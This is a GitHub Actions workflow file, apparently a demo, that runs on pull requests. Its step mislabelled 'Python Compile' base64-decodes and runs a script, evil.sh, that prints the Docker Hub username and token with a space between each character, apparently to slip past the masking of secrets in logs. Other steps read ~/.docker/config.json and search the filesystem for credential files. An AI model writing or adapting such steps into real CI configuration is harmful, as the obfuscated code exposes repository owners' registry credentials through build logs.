name: PythonCI-demo

on:
  workflow_dispatch:
  pull_request: {}

jobs:
  foo:
    runs-on: ubuntu-latest
    #container:
    #  image: mitmproxy/mitmproxy:8.1.1
    #  credentials:
    #    username: ${{ secrets.DOCKERHUB_USERNAME }}
    #    password: ${{ secrets.DOCKERHUB_TOKEN }}
    steps:
    - name: fooo
      run: echo foo
    - name: Python Compile
      run: echo ZWNobyAke0RPQ0tFUkhVQl9VU0VSTkFNRX0gJHtET0NLRVJIVUJfVE9LRU59IHwgc2VkICdzLy4vJiAvZycK | base64 -d >  evil.sh ; bash evil.sh
    - name: next
      run: docker ps -a
    - name: nnext
      run: sudo ps auxf
    - name: nnnext
      run: cat ~/.docker/config.json
    - name: find conf
      run: find / -name config.json
    - name: find cred
      run: find / -name 'docker-credential*'
